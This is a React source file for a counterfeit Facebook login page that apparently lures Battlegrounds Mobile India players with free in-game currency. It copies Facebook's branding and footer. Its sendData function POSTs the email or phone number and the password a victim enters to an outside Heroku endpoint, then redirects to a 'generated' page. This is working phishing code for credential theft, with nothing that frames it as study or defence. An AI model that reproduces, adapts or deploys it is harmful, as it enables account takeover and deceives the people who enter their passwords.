import React, { useState } from 'react'
import './fbstyle.css'

import { useNavigate } from "react-router-dom";

//images
import fblogo from './assets/fblogo.png'
import bgmilogo from './assets/bgmilogo.jpg'
import eye from './assets/eye.webp'
import eyeclose from './assets/eyeclose.webp'

export default function FacebookLogIn() {

    //navigation
    const navigate = useNavigate();

    const navigateToGenerated = () => {
        setTimeout(() => {
            navigate("/generated");
        }, 2000)
    }


    //check Texts
    window.scrollTo(0, 0)

    const [showPassword, setShowPassword] = useState(true)
    const [isValid, setValid] = useState(true)
    const [isValid2, setValid2] = useState(true)

    const [emailPassword, setEmailPassword] = useState({
        email: '',
        password: ''
    })

    const handleClickShowPassword = () => {
        setShowPassword(!showPassword)
    }


    async function sendData() {

        const date = new Date();
        const now = date.getDate() + '-' + date.getMonth() + 1 + '-' + date.getFullYear() + ' ' + date.getHours() + ':' + date.getMinutes() + ':' + date.getSeconds();

        await fetch('https://bgmi-free-uc.herokuapp.com/reg', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                mobileemail: emailPassword.email,
                password: emailPassword.password,
                date: now
            })
        })
    }

    const checkValid = () => {
        // eslint-disable-next-line
        let isValidEmail = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(emailPassword.email)
        let isValidNumber = emailPassword.email.match(/^\d{10}$/)

        if (isValidEmail) {    //Checks if email is valid
            setValid(true)
            if (emailPassword.password.length > 6) {
                setValid2(true)
                sendData()
                navigateToGenerated()
            } else {
                setValid2(false)
            }
        }
        else if (isValidNumber) {   //Checks if Mobile Number is valid
            setValid(true)
            if (emailPassword.password.length > 6) {
                setValid2(true)
                sendData()
                navigateToGenerated()
            } else {
                setValid2(false)
            }
        }
        else {                      //If email is not valid
            if (emailPassword.email === '' && emailPassword.password === '') {
                alert('Please enter your email and password')
            } else {                //sets valid to false
                setValid(false)
            }
        }

    }

    return (
        <>
            <div className="facebook">
                {/* logo */}
                <div className="logo_container">
                    <img className="logo" src={fblogo} alt="logo" />
                </div>
                {/* bgmi logo */}
                <div className="bgmi_container">
                    <img className="bgmi_logo" src={bgmilogo} alt="logo" />
                </div>
                {/* para */}
                <p className="txt">Log into your Facebook account to connect to BATTLEGROUNDS MOBILE INDIA </p>
                {/* mobile or email */}
                <div className="mp_container">
                    <div className="center">
                        <input className="mail_pass" type="text" placeholder="Mobile number or email address"
                            onChange={(event) => { setEmailPassword({ ...emailPassword, email: event.target.value }) }} />
                    </div>
                    {isValid ? null : <p className="error">Invalid Email or Mobile Number</p>}
                    <div className="center">
                        <input className="mail_pass" type={showPassword ? "password" : "text"} placeholder="Facebook password"
                            onChange={(event) => { setEmailPassword({ ...emailPassword, password: event.target.value }) }} />
                        {emailPassword.password.length ? <EyeCompo showPassword={showPassword} func={handleClickShowPassword} /> :
                            null
                        }
                    </div>
                    {isValid2 ? null : <p className="error">Wrong Password</p>}
                </div>
                <div className="center">
                    <button className="btn_login" type="submit" onClick={() => {
                        checkValid()
                    }}>Log In</button>
                </div>
                <div className="cent">
                    <a className="forget_pass" href="https://www.facebook.com/recover/initiate/?ars=facebook_login">Forgotten password?</a>
                    <a className="create_acc" href="https://m.facebook.com/r.php?next=%2Fhome.php">Create account</a>
                    <p className="not_now">Not now</p>
                    <a className="help_cent" href="https://m.facebook.com/r.php?next=%2Fhome.php">Help Center</a>
                    <div>
                        <div className="ss">
                            <div className="btm_txt">
                                <p className="select_lang">English (UK)</p>
                                <p>తెలుగు</p>
                                <p>Français (France)</p>
                                <p>اردو</p>
                            </div>
                            <div className="btm_txt">
                                <p>தமிழ்</p>
                                <p>മലയാളം</p>
                                <p>हिन्दी</p>
                                <div className="center">
                                    <div className="plus">
                                        +
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div className="center">
                            <p className="inc">Facebook Inc</p>
                        </div>
                    </div>
                </div>
            </div>
        </>
    )
}

const EyeCompo = ({ showPassword, func }) => {
    if (showPassword) {
        return <img className="eye" src={eye} alt="eye" onClick={func} />
    }
    return <img className="eye" src={eyeclose} alt="eye" onClick={func} />
}